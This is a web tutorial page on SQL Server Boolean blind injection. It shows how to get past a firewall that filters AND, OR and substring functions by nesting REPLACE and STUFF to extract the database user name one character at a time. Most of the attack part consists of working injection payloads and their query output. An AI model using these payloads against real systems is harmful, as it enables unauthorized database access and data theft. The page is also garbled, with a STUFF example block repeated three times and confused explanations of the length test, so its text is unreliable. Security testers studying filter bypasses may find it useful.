Introduction to SQL Server Injection - Tutorial Boy -->
Home
Sql Injection

Introduction to SQL Server Injection



Introduction


This article mainly introduces the alternative bypass of waf encountered. Then Start by checking manuals of various databases and finding data through search engines

Waf often intercepts various functions, for this situation. The average person circumnavigates waf by punching and punching to find the front and just bypassing it. so we usually look at the manual to find partial door functions and methods to combine to bypass the waf.

SQL Server Smart Functions

The problem is encountered while working on a project in the company, the target has injection, But there are filters that filter separately
and, or, left, right, substring
And this injection point, no error is reported, so only Boolean blind injection can be performed to try to slowly output data

There are two difficulties in injecting data here
  • The site is filtered or and
  • The site filters the commonly used string truncation functions left, right, substring
The first difficulty can use the expressions +, -, *, / these four things to close the code

The second difficulty is more difficult to solve, but there is still a way, that is, REPLACE function + STUFF function to form an alternative string interception function

Related Functions

Replace Function

Definition: REPLACE() Returns the string after replacing all occurrences of the specified string value in the original string with another string value.

First Term: REPLACE (original string, string to find, string to replace)
Second Term: REPLACE(string_expression , string_pattern , string_replacement)

Simply put, replace all occurrences of string_pattern in string_expression with English grammar string_replacement

Example

# replace all strings a with 1
1> select REPLACE('abcdef', 'a', '1');
2> go
+-------+
| |
+-------+
| 1bcdef |
+-------+
(1 rows affected)

# replace all strings b with 1
1> select REPLACE('abcdef', 'b', '1');
2> go
+-------+
| |
+-------+
| a1cdef |
+-------+
(1 rows affected)

# replace all strings ab with 1
1> select REPLACE('abcdef', 'ab', '1');
2> go
+-------+
| |
+-------+
| 1cdef |
+-------+
(1 rows affected)

STUFF Function

it is not a string intercept function, but we can use it as a string intercept function.

STUFF: inserts a string into another string.

It removes characters of the specified length from the beginning of the first string;

insert the second string to the start position of the first string.

STUFF ('data to be modified ' , (int) 'start location', (int) 'Number of characters deleted ', 'content beginning with insertion')

Example

sql server > select STUFF('abcde',1,0,'');
+--------------------------------+
|  field1                        |
+--------------------------------+
| abcde                          |
+--------------------------------+
1 row in set (0.00 sec)And this in

sql server > select STUFF('abcde',1,0,'');
+--------------------------------+
|  field1                        |
+--------------------------------+
| abcde                          |
+--------------------------------+
1 row in set (0.00 sec)And this in

sql server > select STUFF('abcde',1,0,'');
+--------------------------------+
|  field1                        |
+--------------------------------+
| abcde                          |
+--------------------------------+
1 row in set (0.00 sec)And this in

Example

after looking at the examples of the previous two functions, you may be able to guess how I will operate here!
Yes, I want to combine them to replace the string intercept function

because the screenshots involve projects, I can't release the actual screenshots here. I can only test them locally.
  • injection parameters: id

Example: system_user 

# data to inject
1> select system_user;
2> go
+----+
| |
+----+
| sa |
+----+
(1 rows affected)
# test data
1> select * from users;
2> go
+----+-------------+------------+
| id | username | password |
+----+-------------+------------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
| 3 | testaa | 4444 |
+----+-------------+------------+
(3 rows affected)

assume that: https://xxx.test.in/xxx/xxx/list.jsp? id=2
The returned data is as follows:
1> select * from users where id=2;
2> go
+-----+--------------+-----------+
| id  |   username   |  password |
+-----+--------------+-----------+
| 2   | test-user-02 |   234567  |
+-----+--------------+-----------+
(1 rows affected)
Now start to inject

as long as the exhaustive response id=2 data indicates that the injection is successful.

Obtain The Length of System_User Data

you can obtain the length of a data in this way.

Until no error is returned, system_user is equal to that

Error

1> select * from users where id=2-REPLACE(STUFF(system_user,10,0,''),system_user,0);
2> go
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
+----+----------+-----------+
(0 rows affected)

If the value is empty, the system_user parameter must be 10 characters in length. 

1> select * from users where id=2-REPLACE(STUFF(system_user,3,0,''),system_user,0);
2> go
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
+----+----------+-----------+
(0 rows affected)

Error-2

1> select * from users where id=2-REPLACE(STUFF(system_user,2,0,''),system_user,0);
2> go
+--------+------------+-----------+
| id     | username   | password |
+--------+------------+-----------+
| 2      | test-user-02 | 234567
+--------+------------+-----------+
(1 rows affected)

If the value of id = 2 is returned, the length of system_user is 2.

system_user II bit Data

Error

1> select * from users where id=2-REPLACE(STUFF(system_user,1,1,''),'b',0);
2> go
22018 - [SQL Server]Failed converting nvarchar value 'a' to data type int.

database explosion error, description the second digit of system_user is not equal to B.

Error-2

1> select * from users where id=2-REPLACE(STUFF(system_user,1,1,''),'a',0);
2> go
+-----+--------------+-----------+
| id  |   username   |  password |
+-----+--------------+-----------+
| 2   | test-user-02 |   234567  |
+-----+--------------+-----------+
(1 rows affected)
Data with id = 2 is displayed normally, indicating that system_user is the second. Equal A

system_user one bit Data

Error

1> select * from users where id=2-REPLACE(STUFF(system_user,1,0,''),'fa',0);
2> go
22018 - [SQL Server]Failed converting nvarchar value 'o' to data type int.

database explosion error is wrong, description the second digit of system_user is not equal to F.

Error-2

1> select * from users where id=2-REPLACE(STUFF(system_user,1,0,''),'sa',0)
2> go
+-----+--------------+-----------+
| id  |   username   |  password |
+-----+--------------+-----------+
| 2   | test-user-02 |   234567  |
+-----+--------------+-----------+
(1 rows affected)
Data with id = 2 is displayed normally, indicating that system_user one bit equal S

so system_user = sa

Post a Comment